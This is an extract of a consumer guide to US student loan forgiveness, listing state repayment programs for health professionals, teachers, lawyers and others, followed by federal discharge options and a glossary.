+Next Steps
+The application process is handled by WebGrants at the Minnesota Department of Health.
+Minnesota Urban Physician Loan Forgiveness Program
+To Be Eligible …
+You must be an eligible primary care medical resident (family practice, obstetrics and
+gynecology, pediatrics, internal medicine, and psychiatry) who commits to serving for at least 3
+years in an underserved urban community in Minnesota.
+You may receive up to $25,000 per year for a maximum of $100,000 over 4 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+Next Steps
+The application process is handled by WebGrants at the Minnesota Department of Health.
+Mississippi Teacher Loan Repayment Program
+To Be Eligible …
+You must be currently holding a Mississippi Alternate Route Teaching License and a teaching
+position in a Mississippi public school district located in a critical teacher or subject shortage
+area. You must not currently be in default or delinquent on any federal, state, or local
+
+educational loan and not have received funds from the Critical Needs Teacher Loan Scholarship
+Program or the William Winter Teacher Scholar Loan Program.
+If you’re eligible, you can receive up to $3,000 annually for up to 4 years.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+ Private student loans
+Your loans must be for your undergraduate education.
+Next Steps
+You can find the application for this repayment program here.
+Missouri Health Professional State Loan Repayment Program
+To Be Eligible …
+You must be a licensed health professional in Missouri who agrees to work for 2 years in a
+federally designated health professional shortage area.
+You may receive up to $50,000 for your 2-year commitment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+ State loans
+ Institutional loans
+Next Steps
+You will need to apply with the Missouri Department of Health and Senior Services.
+Montana NHSC Student Loan Repayment Program
+To Be Eligible …
+You must be an eligible health care professional who is unable to receive NHSC funding.
+Eligible health care professionals are:
+
+ Physicians—internal medicine, geriatrics, pediatrics, psychiatry, obstetrics/gynecology,
+or family medicine (osteopathic general practice)
+ Physician assistant or nurse practitioner—adult, psychiatry/mental health, family,
+geriatrics, pediatrics, women’s health
+ Primary care registered nurse
+ Certified nurse midwife
+ Psychiatrist (MD/DO)
+ Psychiatric nurse specialist
+ Clinical or counseling psychologist
+ Licensed professional counselor
+ Licensed clinical social worker
+ Marriage and family therapist
+ Dentist (DDS/DMD)
+ Registered dental hygienist
+ Pharmacist
+You may receive up to $15,000 per year for 2 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSLs)
+ Private student loans
+Next Steps
+You can download the application form here.
+
+Montana Quality Educator Loan Assistance Program
+To Be Eligible …
+You must be a full-time educator with a valid license or a licensed professional providing
+services to students in a school district, education cooperative, the Montana School for the Deaf
+and Blind, the Montana Youth Challenge Program, or a state youth correctional facility. You
+must be teaching at an “impacted” school (view the link in this section’s headline for the
+definition of “impacted”) and in an academic area impacted by critical educator shortages.
+If you’re eligible, you can receive up to $3,000 per year for up to 4 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+Next Steps
+You can find the application to this assistance program here. (An account is required to access
+the site.)
+Nebraska Student Loan Repayment Program
+To Be Eligible …
+You must be a qualified health professional who commits to practicing for 3 years in a state-
+designated shortage area.
+You may receive up to $40,000 per year toward student loan repayment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ Institutional loans
+ State loans
+Next Steps
+
+You will need to apply with the Nebraska Department of Health and Human Services.
+Nevada Health Service Corps
+To Be Eligible …
+You must be a health professional who meets licensure standards in Nevada with no restrictions
+upon your DEA certificate. You will need to serve in an assigned community for a contractually
+specified period of time, usually 2 years of full-time service.
+Eligible professionals are:
+ MD Doctors of Allopathic Medicine
+ DO Doctors of Osteopathic Medicine
+ DD General Practice Dentists
+ NP Primary Care Certified Nurse Practitioners
+ NM Certified Nurse-Midwives
+ PA Primary Care Physician Assistants
+ DH Registered Clinical Dental Hygienists
+ CP Clinical or Counseling Psychologists
+ CSW Clinical Social Workers
+ PNS Psychiatric Nurse Specialists
+ MHC Mental Health Counselors
+ LPC Licensed Professional Counselors
+ MFT Marriage and Family Therapists
+Award amounts are based on each individual’s application.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ Institutional loans
+
+ State loans
+Next Steps
+You must apply with the Nevada State Office of Rural Health.
+New Jersey Primary Care Physician And Dentist Loan Redemption Program
+To Be Eligible
+You must be a New Jersey resident who is licensed to practice primary care medicine, dentistry,
+or another primary care profession in a state designated underserved area.
+You may receive up to:
+ 18% of your total balance (up to $21,600) for your first full year of service.
+ 26% of your total balance (up to $31,200) for your second full year of service.
+ 28% of your total balance (up to $33,600) for your third full year of service.
+ 28% of your total balance (up to $33,600) for your fourth full year of service.
+Loans That Qualify
+ Stafford loans
+ Graduate PLUS loans
+ Perkins loans
+ Consolidation loans
+ Federally Insured Student Loans (FISL)
+ Health Education Assistance Loans (HEAL)
+ Health Professions Student Loans (HPSL)
+ New Jersey College Loan to Assist State Students (NJCLASS)
+ Other New Jersey state loans
+ Supplemental Loans for Students (SLS)
+Next Steps
+Learn more about the application process here.
+New Mexico Health Professional Loan Repayment Program
+To Be Eligible …
+You must be a New Mexico health professional and make a 2-year service commitment to
+practice full time in a designated medical shortage area in New Mexico in return for funds to
+repay your student loans.
+
+Eligible health occupations:
+ Advance practice nurse
+ Allied health care provider
+ Allopathic physician
+ Dentist
+ Optometrist
+ Osteopathic physician
+ Physician assistant
+ Pediatrician
+If eligible, you may receive up to $35,000 per year.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Federal consolidation loans
+Next Steps
+The application is available via the link in this section’s headline between March 15 and May 1
+every year.
+New Mexico Teacher Loan Repayment Program
+To Be Eligible …
+You must be a U.S. citizen and New Mexico resident for at least 12 consecutive months, be a
+licensed New Mexico teacher, and be employed at a public school not meeting acceptable
+academic proficiency levels.
+This program provides funds to repay your student loan principal and reasonable interest
+accrued on loans obtained from the federal government for teacher education purposes. If you
+are eligible, you will be required to sign a contract to commit to serve at eligible employment
+sites for 2 school years.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+ Perkins loans
+
+Next Steps
+The application is available via the link in this section’s headline between March 15 and May 1
+every year.
+Public Service Law Loan Repayment Program
+To Be Eligible …
+You must be licensed to practice law in New Mexico as an attorney and shall declare intent to
+practice as an attorney in public service employment at an eligible site for at least 3 years and
+make less than $55,000.
+You may receive up to $7,200 per year.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ State loans
+ Institutional loans
+ Private loans
+Next Steps
+You must complete an application and submit it to the New Mexico Higher Education
+Department.
+District Attorney And Indigent Legal Services Attorney Loan Forgiveness Program (New
+York)
+To Be Eligible …
+You must be a legal resident of New York for 1 year, a U.S. citizen or eligible non-citizen, an
+eligible attorney, and not be serving for the John R. Justice Student Loan Repayment Program.
+New York funding determines the annual amount each year, but you can receive no more than
+$20,400.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+
+ NY student loans
+ Private student loans
+Next Steps
+You can find the application for this program here.
+New York Regents Physician Loan Forgiveness Award Program
+To Be Eligible …
+You must be a primary care physician licensed to practice medicine in New York and have
+completed your professional residency within 5 years of initially applying for the award. You
+must be a New York resident and not be a recipient of the Federal Loan Physician Repayment
+Program. You must commit to serve in a specific underserved area of New York state for at
+least 24 months.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You will need to complete the application found on this this website.
+New York State Licensed Social Worker Loan Forgiveness Program
+To Be Eligible …
+You must be a legal resident of New York for 1 year, a U.S. citizen or eligible non-citizen, a
+social worker professionally licensed in New York, and have at least 1 year of full-time qualified
+service in a critical service area.
+Eligible borrowers can receive up to $6,500 per year, with a maximum of their total qualified
+loan debt or $26,000—whichever is less.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ NY student loans
+ Private student loans
+
+Next Steps
+You can find the application for this program on this website.
+New York State Young Farmers Loan Forgiveness Incentive Program
+To Be Eligible …
+You must have received your undergraduate degree from an approved New York state college
+or university and agree to operate a farm in New York state full time for 5 years. You must apply
+for this program within 2 years of your graduation.
+You may receive up to $10,000 per year for a maximum of $50,000 over the 5-year
+commitment.
+Loans That Qualify
+ Stafford loans
+ Graduate PLUS loans
+ Consolidation loans
+ New York state loans
+ Private loans
+Next Steps
+When it is available each year, you can find the application for this program at the link above.
+Nursing Faculty Loan Forgiveness Incentive Program (New York)
+To Be Eligible …
+You must be a legal resident of New York for 1 year, a U.S. citizen or eligible non-citizen, and a
+registered nurse professionally licensed in New York. You must also have a master’s degree in
+nursing or a doctoral degree that qualifies you as nurse faculty, prior experience as a registered
+nurse, and qualified service (see site for more details).
+Eligible borrowers can receive up to $8,000 per year, with a maximum total of $40,000.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ NY student loans
+ Private student loans
+Next Steps
+
+You can find applications on the website linked in the title of this section; however, applications
+are only available in August.
+North Dakota Loan Repayment—State Program Dentists
+To Be Eligible …
+You must be a North Dakota dentist practicing in an area with a defined need and be willing to
+enter into a 4-year, non-renewable contract with the North Dakota Department of Health in
+exchange for up to $80,000 of student loan repayment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You must complete an application.
+North Dakota Loan Repayment—State Program Physicians
+To Be Eligible …
+You must be a North Dakota physician and be willing to enter into a 2-year, non-renewable
+contract with the North Dakota Department Of Health in a selected community to provide
+service in exchange for up to $90,000 of student loan repayment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You must complete an application and a community participant form.
+North Dakota Loan Repayment—State Program Nurse Practitioners, Physician
+Assistants, and Certified Nurse Midwives
+To Be Eligible …
+You must be a North Dakota nurse practitioner, physician assistant, or a certified nurse midwife
+in an area with a defined health professional need and be willing to enter into a 2-year, non-
+
+renewable contract with the North Dakota Department of Health in a selected community to
+provide service in exchange for up to $30,000 of student loan repayment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You must complete an application and a community participant form.
+North Dakota Science, Technology, Engineering, And Mathematics (STEM) Occupations
+Student Loan Program
+To Be Eligible …
+You must be a North Dakota college graduate with a cumulative GPA of 2.5 or higher and
+employed in a board-approved STEM occupation for 12 months.
+If you are eligible, you can receive up to $1,500 per year, with a maximum total of $6,000.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Loans from the Bank of North Dakota
+Next Steps
+You can find details to apply here.
+North Dakota Teacher Shortage Loan Forgiveness Program
+To Be Eligible …
+You must teach in North Dakota at a grade level and/or in a content area identified as having
+teacher shortages. Eligible borrowers can receive up to $1,000 per year, with a maximum total
+of $3,000.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+
+ Perkins loans
+ Loans from the Bank of North Dakota
+Next Steps
+You can find the application for this program here.
+North Dakota’s Veterinarian Loan Repayment Program
+To Be Eligible …
+You must be a veterinarian who provides food animal veterinary medicine services to defined
+needs areas in North Dakota. You must also complete a contract to provide the veterinary
+services for 2, 3, or 4 years.
+Eligible borrowers can receive up to $15,000 per year for the first 2 years of service and then up
+to $25,000 per year for their third and fourth years of service.
+Loans That Qualify
+ Stafford loans
+ Student PLUS loans
+ Consolidation loans
+ Private student loans
+ Institutional loans
+ Perkins loans
+You must have borrowed these loans for veterinary education.
+Next Steps
+You can apply for this program here.
+Oklahoma Dental Loan Repayment Program
+To Be Eligible …
+You must be a dentist in Oklahoma practicing in an underserved metro area or rural area. In
+addition, at least 30% of your patients must be Medicare recipients.
+Eligible borrowers may receive up to $25,000 per year for 2 to 5 years. However, the availability
+of this program is very limited. Only five dentists receive this award per year.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+
+ Perkins loans
+ Private student loans
+Next Steps
+You can find the application for this program here.
+Oregon Partnership State Loan Repayment Program
+To Be Eligible …
+You must be a primary care provider working in an HPSA-designated service site that is willing
+to provide 50% of the total loan repayment award plus a 10% administrative fee. You will need
+to sign a minimum 2-year service obligation with the option of 1 to 2 years beyond the initial
+obligation.
+Eligible borrowers can receive up to $35,000 or 25% of their qualifying debt (whichever is
+smaller) disbursed every 6 months for their 2 years of service. If you opt to extend your service
+obligation, you may be able to receive additional student loan repayment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Parent PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ State loans
+Next Steps
+You can find the two applications for this program here.
+Pennsylvania Primary Care Loan Repayment Program
+To Be Eligible…
+You must be an eligible primary care provider serving medically underserved populations in
+Pennsylvania. Eligible professions include:
+ Physicians—family medicine, general internal medicine, pediatrics, geriatrics,
+obstetrics/gynecology, and psychiatry
+ Certified Registered Nurse Practitioners—adult, family medicine, pediatrics, geriatrics,
+women’s health, and mental health/psychiatry
+ General dentists
+
+ Registered dental hygienists
+ Certified nurse midwives
+ Physician assistants—adult, family medicine, pediatrics, geriatrics, women’s health, and
+mental health/psychiatry
+ Licensed clinical social worker (employed at a primary care clinic only)
+ Licensed professional counselors (employed at a primary care clinic only)
+ Marriage and family therapists (employed at a primary care clinic only)
+ Psychologists (employed at a primary care clinic only)
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You can access the application here.
+Rhode Island Educational Loan Repayment Program For Primary Care Providers
+To Be Eligible …
+You must be a licensed physician, nurse practitioner, or physician’s assistant newly recruited to
+practice in Rhode Island and work in family medicine, internal medicine, or pediatrics.
+Physicians may receive up to $20,000 per year for 4 years, for a maximum of $80,000. Nurse
+practitioners and physicians assistants can receive up to $10,000 per year for 4 years, for a
+maximum of $40,000. The amount you receive cannot exceed 50% of your educational debt.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+
+Next Steps
+There are separate forms for each vocation. You can download the appropriate one for you from
+the link within the title of this section.
+RISLA Loan Forgiveness For Internships
+To Be Eligible …
+You must have non-federal student loans held by the Rhode Island Student Loan Authority
+(RISLA). You must complete an eligible academic internship worth at least three credit hours
+through an accredited higher education institution and must graduate.
+Only students at Rhode Island schools or residents of Rhode Island attending out-of-state
+schools qualify. Independent studies and practicums that are required for a particular major do
+not qualify.
+The internship must be after May 1, 2013, may be paid or unpaid, and can be done in any state.
+You may receive $2,000 for one three-credit internship after graduation. You can only apply
+once.
+Loans That Qualify
+ Non-federal loans (state loans, private loans, etc.)
+Next Steps
+You can download your application here.
+RISLA Nurse Educators Loan Forgiveness Program
+To Be Eligible …
+You must be a nurse educator hired on or after April 1, 2012, teaching full or part time at a
+degree-granting accredited institution in Rhode Island licensed by the Rhode Island Board of
+Nursing Registration.
+You may receive up to $5,000 annually for up to 4 years. Part-time teachers would have awards
+prorated.
+RISLA is awarding up to $240,000 on a first-come, first-served basis.
+Loans That Qualify
+ Stafford loans
+ Grad or Parent PLUS loans
+ Consolidation loans
+ Private student loans
+ Nursing loans
+
+Next Steps
+You can find the application here.
+South Dakota Recruitment Assistance Program
+To Be Eligible…
+You must be a qualifying physician, dentist, physician assistant, nurse practitioner, or nurse
+midwife practicing in an eligible rural community in South Dakota, and be willing to enter into a
+service contract for 3 years.
+The payment incentive for qualifying physicians and dentists is equal to twice the University of
+South Dakota School of Medicine resident tuition for the 4 most recently completed academic
+years—which is currently $172,172.
+The payment incentive for a qualifying physician assistant, nurse practitioner, or nurse midwife
+is equal to twice the University of South Dakota resident tuition for physician assistant studies
+for the 3 most recently completed academic years—which is currently $40,149.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+Next Steps
+For more information, contact Jacob Parsons at the Department of Health, Office of Rural
+Health, 600 E. Capitol, Pierre, SD 57501; phone 800.738.2301 or 605.773.2679;
+email jacob.parsons@state.sd.us.
+Teach For Texas Loan Forgiveness
+To Be Eligible …
+You must teach in Texas at a designated subject shortage area, which are determined annually,
+and in a designated low-income area school.
+If you’re eligible, you can receive up to $2,500 for teaching service provided during the 2013-
+2014 academic year. Funding for future academic periods has not yet been announced.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+
+ Consolidation loans
+ Perkins loans
+Next Steps
+Applications are emailed to eligible teachers.
+Texas Physician Education Loan Repayment Program
+To Be Eligible …
+Eligible physicians in Texas who commit to serve for at least 4 years in a health professional
+shortage area may receive up to $160,000 for their 4-year commitment.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Loans that are subject to repayment through another student loan repayment or forgiveness
+program do not qualify.
+Next Steps
+You can download an application here.
+Nurses For Wisconsin Initiative
+To Be Eligible …
+This initiative awards pre- and post-doctoral fellowships to qualified nurses who enroll in a Ph.D.
+program at the University of Wisconsin Milwaukee or Madison or DNP program at the University
+of Wisconsin Oshkosh, Eau-Claire, Madison, or Milwaukee. Those who are awarded the
+fellowship and make a 3-year commitment to a faculty position may receive up to $50,000
+toward repaying their student loans.
+Loans That Qualify
+ Stafford loans
+ Perkins loans
+ Federal consolidation loans
+Next Steps
+Contact one of the participating schools to learn more and to apply.
+Wyoming Healthcare Professional Loan Repayment Program
+
+To Be Eligible …
+You must be a physician, health care professional, or dentist who works full time in Wyoming
+and treats Medicare, Medicaid, and Kid Care eligible patients.
+Physicians and dentists may receive up to $30,000 per year for 3 years. All other health care
+professionals may receive up to $10,000 each year for 3 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+Applications are only accepted during certain times of the year. If they are currently available,
+you can find them here.
+
+Part Three: Loan Discharge Options
+
+Closed Schools/School Error
+Borrowers may be eligible to have their loans discharged if their school closed while they were
+attending it or within 120 days of leaving it. They may also be eligible if they withdrew from
+school and were not refunded the correct amount. Borrowers are only eligible if they received
+their loans on or after January 1, 1986.
+Closed School Discharge
+To Be Eligible …
+This program is for borrowers who could not complete their program of study because the
+school closed while they were enrolled or within 120 days of their attendance. If you were
+offered a Teach-Out Program and did not accept or completed your program of studies at
+another institution, you are not eligible.
+If you meet the requirements, you are eligible to have 100% of the loans you took out for that
+program forgiven—including any amounts you’ve already paid.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+ Parent PLUS loans
+ Grad PLUS loans
+ Perkins loans
+Next Steps
+To receive an application for a closed school discharge, you must contact your loan servicer. If
+you have questions regarding your closed school, contact the appropriate person here.
+Unpaid Refund Discharge
+To Be Eligible …
+This is for borrowers who withdrew from school and the school should have returned all or a
+portion of their loans to the federal government and did not. You may be eligible for this whether
+your school is open or closed.
+If you meet the requirements, you are eligible to receive up to the amount that was originally
+supposed to be refunded and was not discharged.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+
+ Parent PLUS loans
+ Grad PLUS loans
+Next Steps
+To see if you are eligible, contact the school you withdrew from and request their federal aid
+refund policy. If you did not follow the school’s posted withdrawal procedures, you may not be
+eligible for a refund. You should also contact your loan servicer for more information.
+Disaster
+This section features a discharge option for victims of September 11, 2001.
+Spouses And Parents Of Victims Of September 11, 2001, Discharge
+To Be Eligible …
+This discharge is available to the spouses of eligible public servants (police officers, firefighters,
+Armed Forces, or other safety and rescue personnel) or other eligible victims who died or
+became permanently and totally disabled due to physical injuries suffered in the September 11
+attacks.
+If you meet these requirements, you are eligible to earn back 100% of the loan amount you
+owed on September 11, 2001.
+Loans That Qualify
+ Stafford loans
+ Parent PLUS loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans made to pay off loan amounts that were owed on September 11,
+2001
+Next Steps
+If you are eligible for this form of forgiveness, access the application here.
+Financial Hardship
+The following options are for borrowers who face financial hardship based on income or debt.
+Bankruptcy
+To Be Eligible …
+In rare cases, borrowers may be eligible to have their student loans discharged due to
+bankruptcy. You will likely need to prove to a bankruptcy judge that repaying your loans would
+be an undue hardship. This standard generally requires you to show that there is no likelihood
+
+of any future ability to repay. As a result, it can be difficult to discharge federal student loans
+through bankruptcy—but not impossible.
+If you are eligible for this type of discharge, you can have up to 100% of your loan’s amount
+forgiven. You may also regain eligibility for federal student aid if you previously lost it.
+Loans That Qualify
+ Stafford loans
+ Parent PLUS loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You must apply for this type of discharge in an adversary proceeding in bankruptcy court, so
+consult a qualified bankruptcy attorney first. To learn how to go about doing this, look here.
+Income-Based Repayment
+To Be Eligible …
+You must make 25 years of eligible payments or 300 payments under the income-based
+repayment (IBR) program. Only payments made on or after July 1, 2009, count.
+Not all borrowers qualify for IBR. To qualify, you must have a partial financial hardship—
+meaning that payments to your eligible loans exceed 15% of your discretionary income. IBR
+caps the maximum monthly payment at 15% of your discretionary income. This is the difference
+between your AGI and 150% of the annual poverty guideline for your family size and state.
+If you are eligible, you can have up to 100% of your outstanding balance forgiven after 25 years
+(10 if you work for a public service or nonprofit employer).
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans, except loans that include Parent PLUS loans
+Next Steps
+To apply for IBR, you need to submit two forms to your servicer: an application and an IRS Tax
+Form 4506-T.
+Income-Contingent Repayment
+To Be Eligible …
+
+You must make 25 years of eligible payments or 300 payments under the income-contingent
+repayment (ICR) program.
+Payments are calculated each year and are based on your annual income (this includes your
+spouse’s income if you file jointly), family size, and the total amount of your federal student
+loans. Payments are capped at 20% of your discretionary income.
+If you are eligible, you can have up to 100% of your outstanding balance forgiven after 25 years
+(10 if you work for a public service or nonprofit employer).
+Loans That Qualify
+ Direct Stafford loans
+ Direct Grad PLUS loans
+ Direct Consolidation loans (including those with Parent PLUS loans)
+Next Steps
+To apply for ICR, sign in to studentloans.gov and complete a request form.
+Pay As You Earn
+To Be Eligible …
+You must be a new Direct Loan borrower as of October 1, 2007, with a disbursement made
+after October 1, 2011. Any Direct Consolidation loan made on or after October 1, 2011, that
+does not include a Parent PLUS loan or a loan made prior to October 1, 2007 is eligible.
+You must make 20 years of payments under the Pay As You Earn repayment plan (or 10 years
+of payments if you work for a public service or nonprofit employer). Not all borrowers qualify for
+Pay As You Earn. To qualify, you must have a partial financial hardship—meaning payments to
+your eligible loans exceed 10% of your discretionary income. Pay As You Earn caps your
+maximum monthly payment at 10% of your discretionary income (the difference between your
+AGI and 150% of the annual poverty guideline for your family size and state).
+If you are eligible, you can have up to 100% of your outstanding balance (after 240 eligible
+payments) forgiven.
+Loans That Qualify
+ Direct Stafford loans
+ Direct Grad PLUS loans
+ Direct Consolidation loans, except those that include a Parent PLUS loan or a loan
+made prior to October 1, 2007
+Next Steps
+To apply for Pay As You Earn forgiveness, sign in to studentloans.gov and complete a request
+form.
+
+Fraud
+You may be eligible to have 100% of your loan discharged if someone fraudulently obtained the
+loan in your name. This includes identity theft and false certification. Forgery is another kind of
+fraud addressed in our links and references section.
+False Certification Due To Identity Theft
+To Be Eligible …
+A person must have been convicted of borrowing the student loans in your name, and you must
+not have received any benefit from the loans. Generally, you must also file and submit a police
+report and various other evidence of identity theft as requested by the loan holder and/or the
+U.S. Department of Education. In addition, you must be willing to assist in any proceedings
+related to the investigation and/or prosecution of the identity theft. This type of discharge is only
+for loans received after July 1, 2006.
+If you meet the requirements, you are eligible to have up to 100% of your student loan
+discharged.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Parent PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+To discharge your loans due to identity theft, you will need to certify that you did not authorize or
+receive benefit from the loans in any way. You will also need to provide six signature samples
+(at least three from around the time that the promissory note for the loan was signed) and a
+copy of the judgment stating that you were a victim of identity theft and that the person
+borrowed the student loan in your name.
+False Loan Certification
+To Be Eligible …
+This discharge is for borrowers whose schools falsely certified their eligibility for a loan. This can
+be caused by a school official falsely signing the borrower’s name on a loan application or
+master promissory note, which resulted in the borrower not benefitting from the funds. This is
+called a false certification due to unauthorized signature.
+False certification also occurs when a school admits a student even though the student did not
+meet the requirements of admission. In this instance, the borrower did not have the ability to
+benefit from the education received. This is called a false certification due to ability to benefit.
+
+The final cause of false loan certification is disqualifying status, meaning the student is unable to
+meet the legal requirements for employment in the student’s state of residence in the
+occupation for which the program of study was intended due to age (upon completion of
+training), physical or mental condition, criminal record, or other reason. At the time the loan was
+issued, this disqualifying status must have existed and the school must have been aware of it.
+This discharge option is only for loans received on or after January 1, 1986.
+If you meet these requirements, you are eligible to receive up to 100% of your federal student
+loan discharged.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Parent PLUS loans
+ Consolidation loans
+Next Steps
+To apply for this type of discharge:
+ Fill out this form for the false certification due to unauthorized signature and submit to
+your loan holder.
+ Fill out this form for the false certification due to ability to benefit and submit to your loan
+holder.
+ Fill out this form for the disqualifying status and submit it to your loan holder.
+Medical
+The following options are for borrowers who suffer from physical or mental impairments or have
+died.
+Death
+To Be Eligible …
+In the unfortunate case of the passing of the borrower, the borrower’s family can have the
+borrower’s loans discharged.
+Parent PLUS loans can be discharged if the borrower (the parent) dies or if the student on
+whose behalf the loan was borrowed dies.
+In the case of spousal Consolidation loans, only the portion of the loan attributed to the
+deceased borrower can be discharged.
+If you meet these requirements, you are eligible to receive up to 100% of your remaining
+balance discharged. In addition, payments made on behalf of the borrower after the borrower’s
+death will be refunded.
+
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Parent PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You must send an original or certified copy of the death certificate (or a photocopy of either) to
+all of the borrower’s loan holders to discharge the loans.
+Total And Permanent Disability
+To Be Eligible …
+A physician must certify that the borrower is unable to engage in substantial gainful activity due
+to a physical or mental impairment. This impairment must be expected to result in death or last
+for a continuous period of at least 60 months, or it must have already lasted for a continuous
+period of at least 60 months.
+Any remaining balance on your federal student loans will be discharged from the date that your
+physician certifies your application.
+The Secretary of Veteran Affairs (VA) can also certify the borrower to be unemployable due to a
+service-connected disability.
+If the VA certified your application, any federal student loan amounts owed after the date of the
+service-related injury will be discharged, and any payments you made after your injury would be
+refunded to you.
+Borrowers may also be eligible for discharge if they have been certified as disabled by the
+Social Security Administration (SSA) where the notice of award for Social Security Disability
+Insurance (SSDI) or Supplemental Security Income (SSI) benefits indicates that the borrower’s
+next scheduled disability review will be within 5 to 7 years.
+If you were approved due to the SSA determination, any remaining balance on your federal
+student loans would be discharged as of the date the SSA determination is received by the
+Department of Education.
+You must return any loan or TEACH Grant disbursements made after the TPD disability
+approval within 120 days.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Parent PLUS loans
+
+ Consolidation loans
+ Perkins loans
+Next Steps
+To apply for this discharge, complete this form and contact your loan holder.
+
+Part Four: Other Useful Stuff
+
+Glossary
+Trying to figure out what some of this student loan lingo actually means? You came to the right
+place.
+Bankruptcy: A process by which some or many of your debts can be discharged—meaning
+you won’t have to pay them. However, it can come with some major costs, like giving up some
+of your assets (such as your home, car, etc.) Most importantly, student loans can be difficult to
+discharge through bankruptcy.
+Discharge: The cancellation of a student loan debt due to certain rare circumstances, such as a
+school closure, the death of the borrower, or total and permanent disability.
+Direct Loan Program (DL): The most common federal loan program. With Direct loans, the
+federal government lends money directly to students, instead of going through a private bank
+(see FFELP). DL offers subsidized and unsubsidized Direct Stafford loans, federal Direct
+Consolidation loans, and Direct PLUS loans. As of June 30, 2010, all new federal student loans
+are Direct loans.
+Federal Family Education Loan Program (FFELP): Prior to July 1, 2010, the Federal Family
+Education Loan Program (FFELP) was an alternative way to get Stafford, PLUS, SLS, and
+Consolidation loans. Private lenders originated FFELP loans with government backing. As of
+June 30, 2010, new FFELP loans are no longer issued.
+Forgiveness: The cancellation of a loan’s remaining balance—or a portion of the balance—by
+the federal government.
+Loan Repayment Plans
+ Income-Based Repayment (IBR): Plan that sets your payment amounts based on your
+income and family size and caps your payments at 15% of your discretionary income if
+you are eligible. After 25 years (10 if you work for a public service or nonprofit employer)
+and 300 eligible payments, any remaining balance may be forgiven but would be
+taxable.
+ Income-Contingent Repayment (ICR): Similar to IBR, but caps your payments at 20%
+of your discretionary income and is available for Direct loan borrowers only. After 25
+years (10 if you work for a public service or nonprofit employer) and 300 eligible
+payments, any remaining balance may be forgiven but would be taxable.
+ Pay As You Earn Repayment: Another plan similar to IBR that allows you to make
+payments of no more than 10% of your discretionary income if you qualify. After 25
+years (10 if you work for a public service or nonprofit employer) and 240 eligible
+payments, any remaining balance may be forgiven but would be taxable.
+Types Of Loans
+ Consolidation loans: Loans that combine one or more pre-existing loans into one new
+loan and (generally) a longer repayment term.
+ Health Professions Student Loans (HPSL): Loans for health care professionals
+specializing in many areas other than primary care or nursing. HPSL are part of Title VII
+of the Public Health Service Act.
+
+ Institutional loans: Non-federal loans provided directly by your school.
+ Nursing Student Loans (NSL): Loans for nursing professionals looking to supplement
+their financial aid. NSL are part of Title VIII of the Public Health Service Act.
+ Stafford loans: The most common federal student loans. Stafford loans can be either
+subsidized or unsubsidized.
+ Supplemental Loans for Students (SLS): Federal loans for financially independent
+students. This program was eliminated in 1994 with the creation of unsubsidized Stafford
+loans.
+ Perkins loans: Federal loans that schools award to their students who have exceptional
+financial need.
+ PLUS loans: Loans borrowed by parents of eligible dependent students (Parent PLUS
+loans) or by graduate students themselves (Grad PLUS loans) typically after exhausting
+their Stafford loan awards.
+ Private student loans: Non-federal loans provided by private lenders that can help you
+pay for school, if you don’t have enough other financial aid.
+Links And References
